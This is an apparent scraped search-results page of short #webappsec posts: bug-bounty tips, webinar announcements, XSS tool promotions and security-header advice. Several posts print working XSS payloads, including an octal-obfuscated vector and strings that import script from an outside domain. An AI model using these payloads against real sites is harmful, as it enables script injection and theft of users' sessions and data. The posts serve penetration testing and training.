#webappsec 搜索结果
BypaXSS - The Brute Art of Bypass Slides from the @BugBountyArg @ekoparty 2025 talk #XSS #Bypass #WebAppSec docs.google.com/presentation/d…
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
🛠️ Webinar — Writing Your First Burp Extension 📅 28 Aug 2025 | 🕘 9–10 PM 🎤 Speaker: Marcus (a.k.a benkyou) 🔗 Join: linkedin.com/feed/update/ur… #CyberSecurity #BurpSuite #WebAppSec #CTF #Webinar
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…
Don't Underestimate HTTP Desync Attacks! HTTP Request Smuggling can lead to cache poisoning, XSS, and more. Make sure you know how to handle such vulnerabilities to keep your applications safe! #CyberSecurity #WebAppSec
Mind the Headers: HTTP Security Headers (X-Frame-Options, X-Content-Type-Options, etc.) are crucial for defending against various attacks. Ensure your web app is fortified! #WebAppSec
Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam
Here's my research about Python dirty Arbitrary File Write to RCE via overwriting shared object files or overwriting bytecode files. Enjoy! siunam321.github.io/research/pytho… #Research #WebAppSec
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
Courtesy of @psiinon a performance fix for @zaproxy Auth Helper was released earlier today. #AppSec #WebAppSec #DevSecOps #DAST
XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty
I learned how web apps work behind the scenes (from HTML/CSS/JS to servers & databases) and how vulnerabilities like SQL Injection, XSS, & CSRF can expose critical systems. academy.hackthebox.com/achievement/21… #CyberSecurity #OWASP #WebAppSec #CloudSecurity #hackthebox #htbacademy
BypaXSS - The Brute Art of Bypass Slides from the @BugBountyArg @ekoparty 2025 talk #XSS #Bypass #WebAppSec docs.google.com/presentation/d…
هانتر واقعی: صبحانهاش قهوه، ناهارش PoC و عصرش ایمیل بونتیِ تاییدشده 💻☕️📬 #BugBounty #WebAppSec
SessionReaper in Magento hijacks live shopper sessions, stealing carts and credentials. Patch now and enforce secure session IDs. malwarebytes.com/blog/news/2025… #infosec #Magento #WebAppSec
if HttpOnly or secure flags are missing, session theft becomes easier.#WebAppSec🍪
Talking about #SSRF, I just got an idea to add SSRF-based #XSS to @KN0X55 ! It's coming in the update next week most probably. #WebAppSec #BugBounty #PenTesting
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
🔟 Server-Side Request Forgery (SSRF) ➡️ Attackers trick servers into making malicious requests. 🔑 Validate URLs, restrict network access, use allowlists. #SSRF #WebAppSec
Upload forms seem basic but are potential goldmines for attackers. The Upload Vulnerabilities room on @RealTryHackMe showed how easily malicious files bypass basic filters. A simple profile picture turning into remote code execution was mind-blowing. #UploadVulns #WebAppSec #RCE
🏆 KNOXSS September 2025 Giveaway 🏆 ➡️ Follow, like and share! 😍 ➡️ 1 Month Pro access for 3 winners on Friday 5th Good luck! 🤞 Check what only KNOXSS can find for you: knoxss.pro/?page_id=766 knoxss.pro - try it now! #WebAppSec #BugBounty #PenTesting
Improve your #XSS PoCs w/ a remote call to our X55.is domain! ➡️ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…
x55.is
XSS Gym - Train your XSS Muscles
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam
XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
🛠️ Webinar — Writing Your First Burp Extension 📅 28 Aug 2025 | 🕘 9–10 PM 🎤 Speaker: Marcus (a.k.a benkyou) 🔗 Join: linkedin.com/feed/update/ur… #CyberSecurity #BurpSuite #WebAppSec #CTF #Webinar
Courtesy of @psiinon a performance fix for @zaproxy Auth Helper was released earlier today. #AppSec #WebAppSec #DevSecOps #DAST
Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec
This classic script vector they use to teach you about XSS doesn't work for DOM-based Reflected vulnerabilities! You can check that in our modern XSS lab. x55.is/brutelogic/gym… knoxss.pro Stay with the best or miss like the rest. #WebAppSec #BugBounty #PenTesting
There are several ways to test for #XSS that can be done manually but it is time expensive and very prone to be forgotten in a proper security assessment. Try knoxss.me #WebAppSec #PenTesting #BugBounty
Mind the Headers: HTTP Security Headers (X-Frame-Options, X-Content-Type-Options, etc.) are crucial for defending against various attacks. Ensure your web app is fortified! #WebAppSec
Something went wrong.
Something went wrong.
United States Trends
- 1. Drake London 1,719 posts
- 2. Falcons 12.1K posts
- 3. Max B 11.2K posts
- 4. Alec Pierce 1,918 posts
- 5. Kyle Pitts 1,112 posts
- 6. Penix 2,284 posts
- 7. Bijan 2,296 posts
- 8. #Colts 2,356 posts
- 9. Badgley N/A
- 10. Zac Robinson N/A
- 11. $SENS $0.70 Senseonics CGM N/A
- 12. #ForTheShoe 1,364 posts
- 13. $LMT $450.50 Lockheed F-35 N/A
- 14. #Talus_Labs N/A
- 15. $APDN $0.20 Applied DNA N/A
- 16. Good Sunday 74.7K posts
- 17. Tyler Allgeier N/A
- 18. #DirtyBirds N/A
- 19. #AskFFT N/A
- 20. Dee Alford N/A